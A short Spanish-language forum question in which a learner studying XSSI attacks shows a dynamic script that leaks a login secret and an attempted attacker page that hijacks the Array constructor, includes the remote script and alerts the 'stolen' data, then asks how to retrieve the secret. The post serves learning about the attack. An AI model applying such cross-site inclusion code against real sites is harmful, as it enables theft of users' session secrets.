Estoy aprendiendo sobre los ataques XSSI y me pregunto si se puede usar el siguiente JS dinámico para acceder al contenido.
Dinamic.js:
if (window.location.hostname === 'Demo.site.com' ){
updateLoginHeader('Nick', 'IWANT-THIS-SECRET'); }
¿Puede el atacante recuperar IWANT-THIS-SECRET utilizando la etiqueta javascript? Estaba intentando algo como:
<script type="text/javascript">
var secrets;
Array = function() {
secrets = this;
};
</script>
<script src="https://example.com/Dinamic.js"type="text/javascript"></script>
<script type="text/javascript">
var yourData = '';
var i = -1;
while(secrets[++i]) {
yourData += secrets[i] + ' ';
}
alert('I stole your data: ' + yourData);
</script>
¿Alguna idea para recuperar IWANT-THIS-SECRET?